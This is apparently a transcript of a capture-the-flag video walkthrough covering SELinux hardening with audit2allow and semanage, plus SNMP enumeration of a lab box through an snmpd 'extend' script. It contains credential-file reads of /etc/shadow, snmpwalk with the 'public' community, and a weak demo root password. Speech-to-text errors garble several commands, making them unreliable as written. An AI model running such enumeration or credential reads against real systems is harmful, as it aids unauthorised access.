to read root.txt from this SNMP thing, it fails. So let's try this. Check 1.sh, cat root.txt. Okay. And we have to SNMPWalk -v2c -c public 10.10.10.241. We can disable that listening, and it's going to be like 2 to 3 minutes for this SNMPWalk to finish, so I'm going to pause the video. Okay, so now that the SNMPWalk is finished, I can go up and let's see, we see the cat root.txt permission denied. So let's go over to this, and I realized what I did wrong with audit to allow. I need -I for input log. So if I do verilog audit.log, it will tell me all the things I need to do. but we'll go over that at the end of the video. So what we wanted to do is grep denied again from var log audit.log. And we're going to go to the last one, except not this dbus thing. We can go to not this dbus thing, this cat. Here we go, cat root.text. So it's a read. So if I grep this for read, tail -1, not greed, read, audit to y to tell me. And we just see it was missing the type enforcement rule to allow this. If I do audit to allow, it will tell me that we need to allow SNMP the, I forget exactly what terminology this is. I want to say the admin home role to allow it to access into these files. All the files in like ls-z/root, we can, well, I guess I forgot to mention this. -z on commands is going to show the process, like the SELinux attributes of the process. So if I do ps eaf grep apache, ps, it's an nginx, and we add a z here, we can see it's using the, I forget exactly what this is. This is domain. I think this is role. This is user, I believe. But using the system user role, we're going to say, and the domain of HTTP, and that's what is blocking access for a lot of things. So it doesn't, the actual services by default don't have access into home directories, because why would a service need access into a home directory? And that is essentially why we were able to quickly, or not quickly, why that access was blocked by default. So if we go back to that audit to allow, all that's saying is, hey, if you want SNMP to be able to read files in /root, you need to give it that access. And that's essentially what the audit to allow -I is doing on this audit log. It's reading that whole log and telling me everything I need to change. So I don't know what the stack override capability is. We could also add the -w flag, and that's going to say Y for everything, which is going to be a lot of text. So we see it's just a type enforcement rule. But I don't like using Y for audit to allow because it's just a spool of text. But you can kind of look over this and see what types of things were blocked. This is allowing connect, bind to ports, get attribute, set attribute, VMware tools accessing a file. I don't know what that's about. I'm going to guess it was trying to read the actual flags, and this may be related to like flag rotation, but I'm not positive because it's the HTTP user, which doesn't make sense to me. Grep. Let's do VM tools exec on var log audit audit.log. Let's see, VM tools, the path, read. It was doing an ls command. I'm not sure why, but that's what it was doing. So that's what this tells you. And again, not everything that's blocked is necessarily going to cause an issue, and you shouldn't always allow everything. But if you just want to get a secure system with SELinux running, I'd recommend running in permissive mode and then doing this audit to allow and just enabling everything, because that's going to be infinitely more secure than not running SELinux at all. And if you don't even want to do that, then just turn it to permissive mode so at least you have things. One of the cool things is SELinux. I think, I'm not blocked. Let's see, ID-Z So I'm in a unconfined context, so that means SELinux doesn't apply to me. I'll show exporting at the end. I was like, oh, I didn't show you how to export things, but we can do it at the end. So I'm in an unconfined context right now for this, which is why I can read etc shadow. Normally, if I wanted to read etc shadow, I would need the specific permission to enable me doing so because it's in this shadow t thing. So, or the shadow domain. I think sysadmins by default don't have access to that, so let's try. Well, they don't have access to read it. They have access to write it through passwd maybe. I forget exactly how that works, but let's just see if we can demo it. I'm going to do se manage login -l, and this is going to show me the policies for the users. We can see that Michelle is in the user context, and what this is doing, MLS, this is like classification. This gets really confusing, but Michelle's in the user context, so even if she had root's password, we can say passwd, and I'm going to set root's password to password, like that, okay? So let's go back here, Michelle, clear, let's do su dash, type password, permission denied. Wait, no, I did read it. Maybe she doesn't have access to sudo? I'm saying something wrong, but if SELinux was configured properly and she was just a user, that would not have been allowed. Let's do v etc sudoers. Maybe it's this that she's allowed to do. Curse the demo gods. Michelle. All, so she can write everything, or she can run sudo now. If I do sudo -l, Michelle's password, I don't want to type that. That was a painful password. Let's just do passwd Michelle, password, okay. Password. Okay, Michelle can run. Let's try doing sudo su. Can I switch users? Password? I can't. So, oh no, I can. Bad demo of SELinux. That's what I get for going live. But let's see if I can disable root from accessing shadow. And again, don't know if this is going to work. I'm going to do se manage modify -s, put them in the sysadmin u for root. Let's see, se manage. Do I do login, modify, there we go. So if I do this se login -l again, root is now sysadm_u. So if I do id-z, it's still unconfined, but if I SSH back in, please, please, please work. Eh? I wonder if the file is not... What? Oh, come on. Did I just, like, brick something? That's gonna suck. Let's see. ls.ssh. Do I have an authorized key file? I do. So I don't think that's the problem. Cat verilog audit. Audit.log. I should have just tailed. Come on. Yeah. Control C. Oh god. It won't let me Control C. This audit log is huge. And normally, there we go. Grep deny on that log. Tail -5. I was about to say, normally I'd like kill that SSH connection and go back in, but I may have locked myself out. What is this? DIN transaction. Okay, let's see what this is. So, where's that grep for this? Tail -1. audit to Y. It's probably just going to be a TE thing. Oh, so apparently sysadmins aren't allowed access to SSH by default. So let's set this policy. And come on. Boom, there I go. ID-Z, I am now a sysadmin. If I cat etc shadow, permission denied. And all is good in the world. So I want to say that may be it. Actually, no. SE manage export. And we can see our SELinux config. So we've set connect and connectdb to 0. I don't know what this unified thing is. We've enabled SSH sysadmin login. We've set Michelle to a user role. We set root to a sysadmin role. So yeah, that is going to be the box. Hope you guys enjoyed that, and sorry if I said anything wrong with SELinux. Not an expert in it. I actually bought a book that came yesterday. Obviously, I can't read it all in one day, but hopefully I'll know more about SELinux, can do a specific video on just SELinux in general. But yeah, apologies for the sloppy cut. After doing the video, OXDF and I were talking, and he got around the SNMP taking 3 minutes to get code execution for the privask by just calling the MIB directly. And turns out I had instructions on how to do this as well, but when I was creating the video, I was too lazy just to go ipsec.rocks, type in MIBs, and click on one of these videos to see how to make SNMPWalk readable. Long story short, you just run dpackage-L to see if the SNMP MIBs downloader is installed. We can see it is here. I really like /s to put it all in one line. But we can see II, so it's installed. If you want to install it, you can just do sudo apt install and then SNMP MIBs downloader, and we'll see it's already installed. Once it's installed, you actually have to do a light configuration change because of weird licensing issues. It's actually hilarious. As SNMP packages come without MIB files due to license reasoning, loading SNMP MIBs is disabled by default. If you want to enable them, just comment out this line. And now when I run SNMPWalk, everything is translated. So we can see what things are, which is handy. So I'm just going to copy this to translated.out. We'll call it SNMP-translated. And then I'm going to pause the video, and we're just going to look over all of these. Actually, something fun to do would be time here. So if you put time before the program, it'll tell you how long it took to run. But yeah, so be right back. Okay, so we can see the SNMP finished, and it took 2 minutes and 44 seconds. So that time command is pretty handy. We look at SNMP translated.out, and we can see everything. So if I do search for HTML, we can see the UCD SNMP MIB disk path.2 is what wrote this path. I'm not sure exactly what this is, but now if I Google it, there's a chance it comes back. I'm actually not sure. You got an OID reference, and maybe it will be something. It just says disk entry. So I'm not sure exactly why that's there, but it is. Disk path where it's mounted. Is that a specific mount? Go here. Do I still have access? If I do mount, grep dub. Oh, yeah. So that is a specific mount. So that is why it's showing up into the SNMP library. Pretty cool. I guess that was just done so it does that. Well, in actual production, I've seen things like this. Like they have the data drive on a separate disk. So when it comes to rebuild the application, let's say you wanted to upgrade from Ubuntu 16 to 18. If your web server's in a separate disk, you just update the OS and then mount the same disk with your web directory, and you have a new OS running the same exact website. So in production environments, you may see it. It's kind of going away because of containerizations, but that is a real-world use case of doing something like that, I guess. I'm going to go back to less-s, and I know I'm running less and then piping it to less because I'm too lazy to go back and erase something. But we can see the SNMP extended mib is running the program. So extended output, and it starts at monitoring. So if I just run this with the extended objects, the SNMPWalk, it'll start there. What I'm doing with this period is I'm just saying start at the parent and query everything. But if I do net-snmp-extend mib ns extended or extend objects, I think, it will only run this. And I guess because I'm curious and this video is already going longer than I expected, let's dig into exactly how this happened in SNMP. I'm going to guess it's in SNMP directory. If I look at snmpd.conf, I'm going to search this for monitor, and there we go. So this is why. In this configuration, the extensible sections talks about how to run shell scripts, extend, monitoring, and then user bin monitor. So that's why this application is being executed every time. And I'd often see people do things like this. Normally it doesn't it's not coded poorly, but a lot of health checking things just query the SNMP of a box because it's normally read-only. So you can have some type of health check that says, yes, this application is running correctly. Put that in a bash script, don't accept any input, and then when the monitoring application hits SNMP on that box, it checks that mib and says, yep, everything is running good. Give it the green check mark and go on. If that doesn't return what it's expecting, then it would go red, send emails to people. So it's an old way to do monitoring. Nowadays, there's Zabbix, or there used to be Nagios that moved into Zabbix now. Nagios is still used, but Zabbix is more popular. And what that does is it has a little agent that generally runs on port 5666, and it talks back to the agent. The agent runs commands and gets the health check. It kind of eliminated SNMP. But for devices like networking gear that doesn't run Zabbix agents, SNMP is still used, so these things come in handy. Hopefully that little rant improved this video and I didn't just waste your time, but take care, guys, and I'll see you all next week.